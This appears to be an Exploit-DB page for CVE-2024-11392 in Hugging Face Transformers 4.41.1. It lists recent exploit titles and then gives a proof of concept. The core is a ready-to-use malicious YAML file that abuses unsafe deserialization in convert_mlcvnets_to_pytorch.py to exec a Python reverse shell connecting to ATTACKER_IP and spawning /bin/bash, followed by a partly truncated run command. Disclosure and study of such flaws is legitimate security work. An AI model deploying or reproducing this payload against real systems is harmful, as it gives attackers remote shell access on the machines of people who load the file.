
24 changes to exploits/shellcodes/ghdb ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE) FLIR AX8 1.46.16 - Remote Command Injection ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF) Ethercreative Logs 3.0.3 - Path Traversal Garage Management System 1.0 (categoriesName) - Stored XSS Nagios Log Server 2024R1.3.1 - Stored XSS ProConf 6.0 - Insecure Direct Object Reference (IDOR) Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS) WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution Car Rental Project 1.0 - Remote Code Execution KodExplorer 4.52 - Open Redirect NagVis 1.9.33 - Arbitrary File Read phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS) phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames Smart Manager 8.27.0 - Post-Authenticated SQL Injection Zabbix 7.0.0 - SQL Injection Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE) Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
31 lines
No EOL
1.6 KiB
Text
31 lines
No EOL
1.6 KiB
Text
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
|
|
# Date: 29-11-2024
|
|
# Exploit Author: The Kernel Panic
|
|
# Vendor Homepage: https://huggingface.co/
|
|
# Software Link: https://github.com/huggingface/transformers/releases
|
|
# Version: 4.41.1
|
|
# Tested on: Linux, Windows, Mac
|
|
# CVE : CVE-2024-11392
|
|
|
|
|
|
# Code flow from input to the vulnerable condition:
|
|
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
|
|
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
|
|
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.
|
|
|
|
|
|
# POC
|
|
|
|
# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
|
|
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.
|
|
|
|
!!python/object/new:type
|
|
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
|
|
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"
|
|
|
|
|
|
# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path
|
|
|
|
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or
|
|
|
|
# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script. |